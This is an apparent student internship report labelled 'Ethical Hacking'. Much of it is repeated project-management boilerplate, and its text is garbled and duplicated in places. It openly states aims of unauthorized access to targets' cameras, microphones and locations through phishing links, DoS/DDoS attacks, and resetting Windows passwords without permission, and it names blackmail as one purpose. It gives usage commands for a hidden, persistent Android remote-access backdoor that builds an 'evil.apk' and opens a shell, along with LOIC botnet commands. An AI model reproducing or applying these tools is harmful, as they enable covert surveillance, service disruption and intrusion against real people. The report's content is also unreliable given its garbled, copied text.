Professional Documents
Culture Documents
Ethical Hacking Report
Ethical Hacking Report
AN INTERNSHIP REPORT
Submitted by
of BACHELOR OF
ENGINEERING
in
Computer Engineering
May, 2023
SAL Institute of Technology and Engineering Research
opposite Science City, Sola, Ahmedabad, Gujarat 380060.
DECLARATION
I hereby declare that the Internship report submitted along with the
Technologies Pvt. Ltd. under the supervision of Mrs. Anjani Suthar and
that no part of this report has been directly copied from any students’
reports or taken from any other source, without providing due reference.
The completion of any project brings with it a sense of satisfaction, but it is never
complete without thanking those individuals who made it possible and whose
constant support has crowned our efforts with triumph. One cannot even imagine
the power of the force that guides us all and neither can we succeed without
acknowledging it.
I would like to express my gratitude to Prof. Sudha Patel, Head of the Department
Ahmedabad, for encouraging and inspiring me to carry out the project. Iwould also
like to thank my internal guide, Mrs. V. Saganya for her expert guidance,
encouragement and valuable suggestions at every step of the project. I would also
like to thank all the staff members of the institute for providing me with the
I would also like to take this opportunity to thank my external guide, Mrs. Anjani
Suthar of Tops Technologies Pvt. Ltd., for mentoring me in the entire internship
and providing me with the required resources and guidance during the course of the
project.
The objective of the internship was to train in the field of "Hacking and
Securing Sensitive information and system information" with hacking tools and
programming language (C++, C#, Python, JSON, HTML, CSS, JS, etc..) and
implement the knowledge gained into a practical world to make a good contribution
in the society. Hence, its vision and primary aim are to help and guide client to a
safer side so that they can secure their private information.
5. JS- JavaScript
8. ER – Entity Relationship
9. C# - C Sharp
Declaration..................................................................................................................i
Acknowledgement......................................................................................................ii
Abstract.....................................................................................................................iii
List of Figures............................................................................................................iv
List of Tables..............................................................................................................v
Abbreviations............................................................................................................vi
Table of Contents.....................................................................................................vii
Chapter 1 Overview of the Company....................................................................1
1.1 History........................................................................................................................1
1.2 Different Products/Scope Of Work............................................................................2
1.3 Capacity Of Company................................................................................................2
Chapter 2 Overview of different processes in the company.................................3
2.1 Details of work carried out in each department..........................................................3
2.2 Technical Specifications of Major Equipment used in each department...................4
2.3 Schematic Layout for manufacturing end product.....................................................5
2.4 Stages Of Productions................................................................................................7
Chapter 3 Introduction to Internship Report.......................................................8
3.1 Internship Summary...................................................................................................8
3.2 Purpose.......................................................................................................................9
3.3 Objective.....................................................................................................................9
3.4 Scope........................................................................................................................10
3.5 Technology Review..................................................................................................11
3.5.1 Technology Review..................................................................................................11
3.5.2 Justification of Technology......................................................................................14
3.6 Internship Planning…...............................................................................................15
3.6.1 Project Development Approach and Justification....................................................15
3.6.2 Internship Effort Estimation.....................................................................................18
3.6.3 Roles and Responsibilities........................................................................................18
3.6.4 Group Dependencies.................................................................................................19
1.1 HISTORY
They have worked for and have provided services to the 6 of the top 10 Fortune 500
companies of the world. Their team has worked in the US for more than 10 years and has
management degrees from the US.
TOPS Technologies was awarded the TOP 2008 Business in the US for the year 2008-2009.
Started with a vision of bridging the gap between skills required and talent created by
colleges, today TOPS Technologies is one of the largest IT Training and Finishing Schools
with expertise in ASP.Net, PHP, Java, iPhone, Android, Software Testing, SEO, Web
Design. Today they have Software Development training centers in Ahmedabad, Vadodara,
Rajkot, Surat, Navsari, Mehsana, Junagadh, Indore, Bhopal, Jabalpur, Noida, Kota, Jaipur,
Nagpur, Dehradun.
TOPS Technologies has worked on several domains for Android and Windows apps along
with cross platform apps too. Some of the company’s works include:
Organizing a Job Fest where 50+ Companies interview Candidates for their Job Openings.
This event is organized at a Convention center.
Maximum salary offered by companies during JobFest for a fresher has been 7.2 lacs
Each student interviews with maximum companies in 1 day
Companies get to interact with multiple candidates and offer maximum salaries
Candidates select the best Job Offers
Apart from these projects, the company offers wide range of services like Web
Development, Specialized Courses, Live Project Training, Digital Marketing services and
much more.
TOPS Technologies offer a wide range of services like app development for Android,
Windows, web development, digital marketing solutions, UI/UX design, Data science and
solutions.
TOPS Technologies Pvt Ltd is established in 2008-2009. It believes in working with less
but highly qualified and experienced developers. With a team of 19+ offices in India,
followed by standard software development process.
Project planning is part of project management, which relates to the use of schedules such as
Gantt charts to plan and subsequently report progress within the project environment.
Initially, the project scope is defined and the appropriate methods for completing the project
are determined. Following this step, the durations for the various tasks necessary to
completethe work are listed and grouped into a work breakdown structure. Project planning
is often used to organize different areas of a project, including project plans, workloads and
the management of teams and individuals.
Project Management System has six major modules of Admin, Manage Application, Test
Management, Process Management, Manage Comment, Reports. We analyzed the overall
complexity of each of these modules and it was found that the project will require
approximately 12 weeks to get completed, so we planned accordingly.
Web and app developers work on different project definitions to build a fully working
model. Testing department is in charge of testing the working of different elements and
functionalities in the project built by developers and provide feedback status to developers
pointing out errors if any.
Hardware: -
Software: -
Scheduling begins with the process composition. The characteristics of the project are used
to adapt an appropriate task set for the work to be done. The task network is used tocompute
the critical project path, a time line chart and a variety of project information. When creating
a software project schedule, the planner begins with a set of tasks. If automated tools are
used, the work breakdown is input as a task network or task outline. Effort, duration, and
start date are then input for each task. In addition, tasks may be assigned to specific
individuals. As a consequence of this input, a timeline chart, also called a Gantt chart is
generating. A Timeline Chart can be developed for the entire project. Timeline Charts depict
a part of a software project schedule
The incremental build model is a method of software development where the model is
designed, implemented and tested incrementally (a little more is added each time) until the
product is finished. It involves both development and maintenance. The product is defined
asfinished when it satisfies all of its requirements. This model combines the elements of the
waterfall model with the iterative philosophy of prototyping.
In incremental model the whole requirement is divided into various builds. During each
iteration, the development module goes through the requirements, design, implementation
and testing phases. Each subsequent release of the module adds function to the previous
release. The process continues till the complete system is ready as per the requirement.
Like other SDLC models, Iterative and incremental development has some specific
applications in the software industry. This model is most often used in the following
scenarios:
A new technology is being used and is being learns by the development team while
working on the project.
Resources with needed skill set are not available and are planned to be used on contract
basis for specific iterations.
Project Management System has six major modules of Admin, Manage Application, Test
Management, Process Management, Manage Comment, Reports. We analyzed the overall
complexity of each of these modules and it was found that the project will require
approximately 14 weeks completing, so we planned accordingly.
We decided to follow the SDLC i.e., Software Development Life Cycle while planning
various phases of our project. This method consists of following activities:
There are some high-risk features and goals which may change in the future.
Integration and Testing: All the units developed in the implementation phase are integrated
into a system after testing of each unit. Post integration the entire system is tested for any
faults and failures.
Deployment of system: Once the functional and nonfunctional testing is done, the product is
deployed in the customer environment or released into the market.
Maintenance: There are some issues which come up in the client environment. To fix those
issues patches are released. Also, to enhance the product some better versions are released.
Maintenance is done to deliver these changes in the customer environment.
In the first 7-8 weeks, I understood the fundamentals of language's, network information,
finding vulnerabilities, frameworks and performed various coding tasks on different
concepts like loops, loop statements, operators, functions, lists, tuples, arrays, OOP
concepts, random modules, etc.
Later, I learned how to bypass operating system using bash scripting, password changing
without user permission, accessing android mobile remotely concepts and usage of 3
important libraries in Python for requests, colorama, psutil, python3(version), etc.
Finally, I implemented these concepts to develop the project, according to roles and
responsibilities assigned to me. Next, were the days of testing and evaluation to make sure
that the tools and application was smooth, gave accurate results and was overall efficient.
3.2 PURPOSE
The Purpose of this project is to develop a tool which can scan a network for finding
vulnerabilities, creating an application which is created using python, python libraries, bash
scripting as well as a kotlin program which can generate a malicious file in order to bypass
the firewall as well as accessing the android device remotely and creating a bash
scripting file to change the windows 7&10 operating system user password without user
permission.
3.3 OBJECTIVE
The objective of this internship is to implement such tools and application in our project that
serves as a platform for scanning a network for finding vulnerabilities, creating an
application which is created using python, python libraries, bash scripting as well as a kotlin
program which can generate a malicious file in order to bypass the firewall as well as
accessing the android device remotely and creating an bash scripting file to change the
windows 7&10 operating system user password without user permission.
The ultimate aim is to enhance the scope of this project to make such tools which can be
used to bypass any system and accessing a device which uses internet.
3.4 SCOPE
Client can use the developed tools to generate a link which can be given to the targeted user
in form of Qr-code or some custom link to access and device mic, camera and location.
Client can use the tools which is created to down any targeted website server performance
using the concept of DOS (Denial Of Services) and DDOS (Distributed Denial Of Services)
attack.
Client can also write a bash scripting file which can bypass the windows 7&10 system just
you have to upload that scripting file in pendrive and plugin to a targeted device and boot it
up and change the user's device password.
Client can also use one tool (IP tracker) which is basically use to take out all information of
particular IP address such as location, country region, company sim name, post card
number,etc.
o Python
Often, programmers fall in love with Python because of the increased productivity it
provides. Since there is no compilation step, the edit-test-debug cycle is incredibly fast.
Debugging Python programs is easy: a bug or bad input will never cause a segmentation
fault. Instead, when the interpreter discovers an error, it raises an exception. When the
program doesn't catch the exception, the interpreter prints a stack trace. A source level
debugger allows inspection of local and global variables, evaluation of arbitrary expressions,
setting breakpoints, stepping through the code a line at a time, and so on. The debugger is
written in Python itself, testifying to Python's introspective power. On the other hand, often
the quickest way to debug a program is to add a few print statements to the source: the fast
edit-test-debug cycle makes this simple approach very effective.
o C#
C# is pronounced "C-Sharp".
C# has roots from the C family, and the language is close to other popular languages
likeC++ and Java.
C# is used for:
Mobile applications
Desktop
applicationsWeb
applications Web
services
Web
sites
Games
VR
Database applications
And much, much more!
History of C#:
The first version was released in year 2002. The latest version, C# 11, was released in
November 2022.
It is a plain text file containing a set of various commands that we usually type in the
command line. It is used to automate repetitive tasks on Linux filesystem. It might include a
set of commands, or a single command, or it might contain the hallmarks of imperative
programming like loops, functions, conditional constructs, etc. Effectively, a Bash script is a
computer program written in the Bash programming language.
History:
Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a
free software replacement for the Bourne shell. First released in 1989, it has been used as the
default login shell for most Linux distributions. Bash was one of the first programs Linus
Torvalds ported to Linux, alongside GCC.
Richard Stallman at that time began GNU project with Free Software Foundation (FSF) to
create a UNIX-compatible operating system aiming everything as open-source. There wasa
lack of progress in the revolution. He needed a free shell that could run existing shell scripts.
It was imperative to a completely open-source system built as one of the few projects he
funded with FSF. Then on January 110, 1988, Brian Fox (FSF employee) began coding on
Bash and released Bash as beta, version 0.99 on June 8, 1989.
Features:
Directory manipulation, with the pushd, popd, and dirs commands.
Job control, including the fg and bg commands and the ability to stop jobs with CTRL-Z.
Brace expansion, for generating arbitrary strings.
Tilde expansion, a shorthand way to refer to directories.
Aliases, which allow you to define shorthand names for commands or command lines.
Command history, which lets you recall previously entered commands.
A 'Hacking Using Social Engineering' is a collection of modular tools that abstracts away
much of the difficulty–and repetition–inherent in Hacking World. For example, most tools
need the same basic functionality: the ability to track only IP address, set URL routes,
scanning vulnerabilities, handle security properly, and so on. Rather than recreate all of this
from scratch, programmers over the years have created web frameworks in all the major
programming languages: python, bash scripting, and Express in JavaScript among many,
many others.
Libraries inherited Python’s dependencies approach and includes out-of-the box support
forcommon tasks in Hacking, including:
User authentication
Testing
URL routes, creating clone of any website
Creating tools
Security and performance upgrades
Support for multiple database backends
The overall task is to just gain the unauthorize access and capturing the sensitive
informationof a targeted user for any purpose (blackmailing to take some rewards or for fun
purpose, etc.).
Internship planning is part of project management, which relates to the use of schedules such
as Gantt charts to plan and subsequently report progress within the project environment.
Initially, the project scope is defined and the appropriate methods for completing the project
are determined. Following this step, the durations for the various tasks necessary to
complete the work are listed and grouped into a work breakdown structure.
Internship planning is often used to organize different areas of a project, including project
plans, workloads and the management of teams and individuals.
Planning before any activity is very much important. And if it is planned nicely, then
successis guaranteed.
Project Management System has six major modules of Admin, Manage Application, Test
Management, Process Management, Manage Comment, Reports. We analyzed the overall
complexity of each of these modules and it was found that the project will require
approximately 14 weeks completing, so we planned accordingly.
We decided to follow the SDLC i.e., Software Development Life Cycle while planning
various phases of our project. This method consists of following activities:
In incremental model the whole requirement is divided into various builds. During each
iteration, the development module goes through the requirements, design, implementation
and testing phases. Each subsequent release of the module adds function to the previous
release. The process continues till the complete system is ready as per the requirement.
A new technology is being used and is being learns by the development team while working
on the project.
Resources with needed skill set are not available and are planned to be used on
contract basis for specific iterations.
There are some high-risk features and goals which may change in the future.
Integration and Testing: All the units developed in the implementation phase are integrated
into a system after testing of each unit. Post integration the entire system is tested for any
faults and failures.
Deployment of system: Once the functional and nonfunctional testing is done, the product is
deployed in the customer environment or released into the market.
Maintenance: There are some issues which come up in the client environment. To fix those
issues patches are released. Also, to enhance the product some better versions are released.
Maintenance is done to deliver these changes in the customer environment.
Effort Estimation:
Each company determines the output it expects from its team members. Let us call the
average output of a team member per man-hour as the unit output. Assume that one has to
deliver an end-to-end login module's functionality for an application. The time spent on the
login functionality should include the corresponding time required for gathering the
requirements, doing a requirement analysis, architecture inputs, form design, object/class
design, implementing the business rules, data validation and storage, framework (i.e., code
for login module's constants, enumerations, utilities), testing, debugging, deployment up to
user acceptance, etc.
Now, the estimator has to figure out how many man-hours it would take to complete the
login module, keeping all these factors in mind. The sequence of work and dependencies
should be considered as they do cause delays in completion.
For example,
Client can use the developed tools to generate a link which can be given to the targeted user
in form of Qrcode or some custom link to access and device mic, camera and location.
Client can use the tools which is created to reduce any targeted website server performance
using the concept of DOS (Denial Of Services) and DDOS (Distributed Denial Of Services)
attack.
Client can also write a bash scripting file which can bypass the windows 7&10 system just
you have to upload that scripting file in pendrive and plugin to a targeted device and boot it
up and change the user's device password.
As an intern, there are different roles and responsibilities that one has to fulfill:
Understand and undergo extensive training given by mentors in the field of Ethical Hacking.
Fulfill the tasks given by supervisors.
Conduct research work for the implementation of project.
Performtesting for the project under the supervision of mentors.
Attend meetings with mentors for giving report of daily work.
Tools development using various languages.
Creating fake https website to test our tools.
The project that I was assigned under, is titled ‘Hacking Using Social Engineering’. The
modules where I had to work on included: gathering resources, implementing tools and
applications, generating apk files for remotely accessing any android device, etc.
I also developed such application under my mentor guidance which can actual slow down
the website access performance as well as a website which can generate such link by using
which we can access any device's camera, mic and location.
When combined with estimation methods and risk analysis, scheduling, establishes a road
map for the project management.
Scheduling begins with the process composition. The characteristics of the project areused to
adapt an appropriate task set for the work to be done.
The task network is used to compute the critical project path, a time line chart and a variety
of project information.
When creating a software project schedule, the planner begins with a set of tasks. If
automated tools are used, the work breakdown is input as a task network or task outline.
Effort, duration, and start date are then input for each task. In addition, tasks may be
assigned to specific individuals.
As a consequence of this input, a timeline chart, also called a Gantt chart is generating. A
Timeline Chart can be developed for the entire project. Timeline Charts depict a part of a
software project schedule.
All project tasks are listed in the left-hand column. The horizontal bars indicate the duration
of each task. When multiple bars occur at the same time on the calendar, task concurrency is
implied. The diamonds indicate milestones, which indicate the place where our project
reach.
1 Requirements 25 27
3 Designing 40 50
4 Coding 55 60
5 Documentation 15 17
The current system relies on the feature, where users can share their unfortunate experiences
about hacking on a platform that resembles other social media platforms. This way, people
can be aware about the ways in which the hackers are targeting the users. However, there is
usually no map provided to help users efficiently and notice what crimes occurs in which
areas. Moreover, the anonymity feature is usually absent that leads to loss of integrity and
privacy of the victims not talking about it at all due to insensitive remarks and opinions that
they receive in return.
If the firewalls are on in the system, then it might create a problem for some tools to operate
on it.
Weak management
Failing to secure privacy and integrity of users
Poor user experience
Static system
No proper legal resources for educational purposes
Lack of knowledge about current technology
The Windows Protection is usually on in most of the systems so it might be difficult to
overlap that security.
If there is any Anti-Virus in the system then also it is difficult to hack a system.
4.4.1 Does The System Contribute To The Overall Objectives Of The Organization?
The proposed system effectively contributes to the objectives of the organization, which is
to use technology to bring meaningful change in the society.
4.4.2 Can The System Be Implemented Using The Current Technology And Within
The Given Cost And Schedule Constraint?
The system can be implemented using various tools available online and the
available ethicalhacking modules within the cost limits and time constraints.
4.4.3 Can The System Be Integrated With Other Systems Which Are Already In
Place?
The new system can be integrated with other Hacking Methodologies to enhance
thefunctionalities and utilities.
Scanning Networks
Enumeration
Social Engineering
Session Hijacking
Hardware: -
Software: -
Features:
- Obtain Device Information Without Any Permission!
- Access Location [SMARTPHONES]
- Access Webcam
- Access Microphone
Update Log:
- The overall structure of the tool is programmed from the beginning and is available as a
web panel (in previous versions, the tool was available in the command line).
- Previous version's bugs fixed!
- Auto-download Ngrok Added!
- The templates have been optimized!
- Logs can be downloaded (NEW)!
- Clear log Added!
- It can be uploaded on a personal host (you won't have the Ngork problems anymore)
- You can start and stop the listener anytime! (At will)
- Beautified user interface (NEW)!
Attention:
This version can be run on both local host and your personal domain and host. However, you
can use it for both situations. If your country has suspended the Ngrok service, or your
country's banned Ngrok, or your victim can't open the Ngrok link (for the reasons such as:
Hesees such a link as suspicious, or if this service is suspended in his country) We suggest
usingthe tool on your personal host and domain.
Dependencies:
It requires following programs to run properly -
- `php`
- `python3`
- `git`
- `Ngrok`
Platforms Tested:
- Kali Linux 2023
- ubuntu version 22.04 2023
- Personal host (direct admin and cPanel)
Attention:
Note that to use this tool on your Localhost, you also need SSL. Because many of the
tool'scapabilities require SSL.
Here are some snapshotsof the interface and different user modules of our application:
5.8 Pop-up window that the Target User will get for accessing the link
5.9 Fetching the details of Target after the Link has been clicked on
Android-device-hack is a tool designed to give the control of the android system remotely
and retrieve information from it. Android-device-hack is a client/server application
developed in Java Android for the client side and the Server is in Python.
Android-device-hack will work on device from Android 4.1 (Jelly Bean) to Android 9.0
(Oreo) (API 16 to API 28)
AndroRAT also works on Android 10 (Q) but some of the interpreter command will be
unstable.
Features of Android-device-hack:
* Full persistent backdoor
* Invisible icon on install
* Light weight apk which runs 24*7 in background
* App starts automatically on boot up
* Can record audio, video, take picture from both camera
* Browse call logs and SMS logs
* Get current location, sim card details, IP, MAC address of the device
Prerequisites:
Android-device-hack requires Python3 and JAVA (or Android Studio)
Installation:
cd Android-device-hack
pip install -r requirements.txt
Note: While cloning the repository using Git bash on Windows, you may get the following
error: unable to create file \<filename>: Filename too long
This is because the Git has a limit of 4096 characters for a filename, except on Windows
when Git is compiled with msys. It uses an older version of the Windows API and there's a
limit of 260 characters for a filename.
Note: In order to use this feature in some devices you need to enable the option
`displaypop-up windows running in background` from the settings.
Available Modes:
`--build` - for building the android apk
`--ngrok` - for using ngrok tunnel (over the internet)
`--shell` - getting an interactive shell of the device
`build` mode:
Usage:
python3 androRAT.py --build --ngrok
[flags] Flags:
-p, --port Attacker port number (optional by default its set to 8000)
-o, --output Name for the apk file (optional by default its set to "karma.apk")
-icon, --icon Visible icon after installing apk (by default set to
hidden) python3 androRAT.py --build [flags]
Flags:
-i, --ip Attacker IP address (required)
-p, --port Attacker port number (required)
-o, --output Name for the apk file (optional)
-icon, --icon Visible icon after installing apk (by default set to hidden)
`shell` mode:
Usage:
python3 androRAT.py --shell [flags]
Flags:
-i, --ip Listner IP address
-p, --port Listner port number
After running the `shell` mode you will get an interpreter of the device.
Examples:
To build the apk using ngrok which will also set the listner: python3 androRAT.py --build
-- ngrok -o evil.apk
To build the apk using desired ip and port: python3 androRAT.py --build -i 192.169.x.x -p
8000 -o evil.apk
To get the interpreter: python3 androRAT.py --shell -i 0.0.0.0 -p 8000
Here are some snapshotsof the interface and different user modules of our application:
HIVEMIND/HIDDEN MODE:
HIVEMIND mode will connect your client to an IRC server so it can be
controlled remotely. Think of this as a voluntary botnet (though do beware that
your client canpotentially be made to do illegal things).
Note: It does NOT allow remote administration of your machine, or anything like that; itis
literally just control of loic itself.
random=true startTo reset loic's options back to its defaults: !lazor default
To stop an attack: !lazor stop and be sure to remove "start" from the END of the topic, if
it exists,too.
TO TEST THIS TOOL USE THIS WEBSITE LINK:
www.email-sender-by-soumyajit.epizy.com
Take a look at source code for more details.
Installation:
Kali Linux / Ubuntu / Parrot OS:
sudo apt-get
update sudo apt-get
install git sudo apt-
get install pip sudo
apt install python3
git clone
https://github.com/samirsinghkshatriya/IP-
Trackerlscd
Live-
location.pyls
sudo python3 Live-location.py
Termux Installation:
apt update
apt install git
apt install python
apt install python3
apt install pip
git clone https://github.com/samirsinghkshatriya/IP-Tracker
ls
cd Live-location.py
ls
python3 Live-location.py
Disclaimer:
Live-location tool not responsible for misuse and for illegal purposes. Use it only for Pentest
or Educational purpose.
Hacking is not a crime (Pull requests are always welcome)
Here are some snapshotsof the interface and different user modules of our application:
CHAPTER 6: TESTING
A test plan is the cornerstone of a successful testing implementation. The testing plan
represents the overall approach to the test. In many ways, the test plan serves as a summary
of the test activities that will be performed. It shows how the tests will be organized, and
outlines all of the tester’s needs that must be met in order to properly carry out the test. The
goal of test planning is to establish the list of tasks that, if performed, will identify all
ofthe requirements that have not been met in the software. There are many standards that
can be used for developing test plans. Early in the deployment planning phase, the testing
effort, and identifies the methodology that your team will use to conduct tests.
It also identifies the hardware, software, and tools required for testing and the features and
functions that will be tested. A well-rounded test plan notes any risk factors that jeopardize
testing and includes a testing schedule. So, we can say that Test Planning details the
activities, dependencies and effort required to conducting the system test.
Test analysis involves execution and implementation of the software with test data and
examining the outputs of the software and its operational behavior to check that it is
performing as required. Defect Testing is intended to find inconsistencies between a
program and its specification. These inconsistencies are usually due to program faults or
defects.
A test case is a document, which has a set of test data, preconditions, expected results and
post conditions, developed for a particular test scenario in order to verify compliance against
a specific requirement.
Test Case acts as the starting point for the test execution, and after applying a set of input
values; the application has a definitive outcome and leaves the system at some end point or
also known as execution post condition.
Testing was done by us under the guidance of our mentors. If an error occurred, we were
supposed to note it downand make changes that would reflect positively on the website.
During the course of the internship, I successfully implemented the concepts that I learnt.
Under the guidance and suggestions of our external and internal guide, I implemented the
modules assigned to me during internship period.
The working model of the project/tools & application will undergo some changes.
During the development and testing phase, some problems were encountered that included
error in code, technical difficulties, inaccuracy of data, inaccurate redirection, problem while
integrating some Python files.
The solutions were given soon by our mentors who guided us throughout this project and
enabled us to create a fully working model of an application.
The 12-week internship at TOPS Technologies included extensive training in the field of
Ethical, followed by learning the countermeasures of the attacks. Performing various tasks
and real-life examples on different topics and modules gave us confidence to implement all
the modules.
The 12-week internship at "TOPS TECHNOLOGY" included extensive training in the field
of "Ethical Hacking". Performing various tasks and real-life examples on different topics
and modules gave us confidence to implement all the modules into a real application.
The project was divided into different modules. The roles and responsibilities were assigned
to us under the guidance of our mentors. The SDLC model used was, incremental and
iterative model. Project planning and scheduling was done specifically considering the
academic curriculum. The modules assigned to me were: tools & application development,
research work for collecting data, finding vulnerabilities and threat loop of a system.
REFERENCES
[9] Python Handbook: Essential Tools for Working with Data, book by Jake VanderPlas